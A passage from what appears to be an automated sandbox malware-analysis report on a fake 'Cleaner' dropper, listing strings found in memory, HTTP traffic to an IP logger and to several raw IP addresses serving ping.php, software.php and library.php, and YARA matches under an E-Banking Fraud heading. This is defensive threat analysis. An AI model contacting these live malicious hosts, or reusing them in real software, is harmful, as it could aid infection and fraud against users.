Source: Cleaner.exe, 00000016.00000002.565355076.000001CFC95BB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr; String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: Cleaner.exe, 00000016.00000003.437639112.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: Cleaner.exe, 00000016.00000003.437840133.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437639112.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com(
Source: Cleaner.exe, 00000016.00000003.439359814.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: Cleaner.exe, 00000016.00000003.436930103.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Cleaner.exe, 00000016.00000003.438267437.000001CFE1B50000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: Cleaner.exe, 00000016.00000003.447075330.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designerso
Source: Cleaner.exe, 00000016.00000003.439268166.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439104249.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439219729.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439012764.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.438961213.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439161982.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designersp
Source: Cleaner.exe, 00000016.00000003.436987400.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.comH_
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fonts.com
Source: Cleaner.exe, 00000016.00000003.430687491.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430832292.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430600821.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430933717.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430979463.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430553370.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430753328.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.431021568.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: Cleaner.exe, 00000016.00000003.431228141.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.431179686.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430147464.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Cleaner.exe, 00000016.00000003.430832292.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430600821.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430979463.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430553370.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cn
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: Cleaner.exe, 00000016.00000003.434754929.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434991979.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Cleaner.exe, 00000016.00000003.434593062.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/.T
Source: Cleaner.exe, 00000016.00000003.434380388.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/.TTC
Source: Cleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/F
Source: Cleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ho
Source: Cleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/ho
Source: Cleaner.exe, 00000016.00000003.434380388.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/ho
Source: Cleaner.exe, 00000016.00000003.444449589.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.444320811.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.monotype.9
Source: Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428357477.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428374052.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428388847.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.com-
Source: Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.comcom
Source: Cleaner.exe, 00000016.00000003.428357477.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428374052.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.comd:
Source: Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.como2
Source: Cleaner.exe, 00000016.00000003.428388847.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.comtr
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sakkal.com
Source: Cleaner.exe, 00000016.00000003.435071712.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.sakkal.comI
Source: Cleaner.exe, 00000016.00000003.430026733.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.tiro.com
Source: Cleaner.exe, 00000016.00000003.431705459.000001CFE1B20000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.tiro.comq
Source: Cleaner.exe, 00000016.00000003.429063853.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.typography.net
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.typography.netD
                  Source: Cleaner.exe, 00000016.00000003.429063853.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netad
                  Source: Cleaner.exe, 00000016.00000003.436737283.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436633622.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436859788.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437363653.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437170500.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437117752.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437064705.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436930103.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437229886.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Cleaner.exe, 00000016.00000003.432353861.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Cleaner.exe, 00000016.00000003.432353861.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn.TTF
                  Source: file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
                  Source: Cleaner.exe, 00000016.00000002.565355076.000001CFC95BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org
                  Source: file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.563291404.000001CFC91C1000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7
                  Source: Cleaner.exe, 00000016.00000002.565404043.000001CFC95CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.orgx
                  Source: Cleaner.exe, 00000016.00000002.563291404.000001CFC91C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                  Source: unknownDNS traffic detected: queries for: iplogger.org
                  Source: global trafficHTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.5:49701 version: TLS 1.2

                  E-Banking Fraud

                  Source: Yara match | File source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.20.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.26.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.20.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.28.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.32.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.26.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.24.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.22.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.21c0e67.30.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
